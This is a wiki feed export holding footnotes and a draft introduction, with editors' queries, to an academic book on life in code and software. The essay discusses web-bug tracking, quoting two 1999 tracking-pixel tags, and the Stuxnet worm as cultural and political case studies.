[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4707</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4707"/>
		<updated>2012-04-18T14:29:47Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
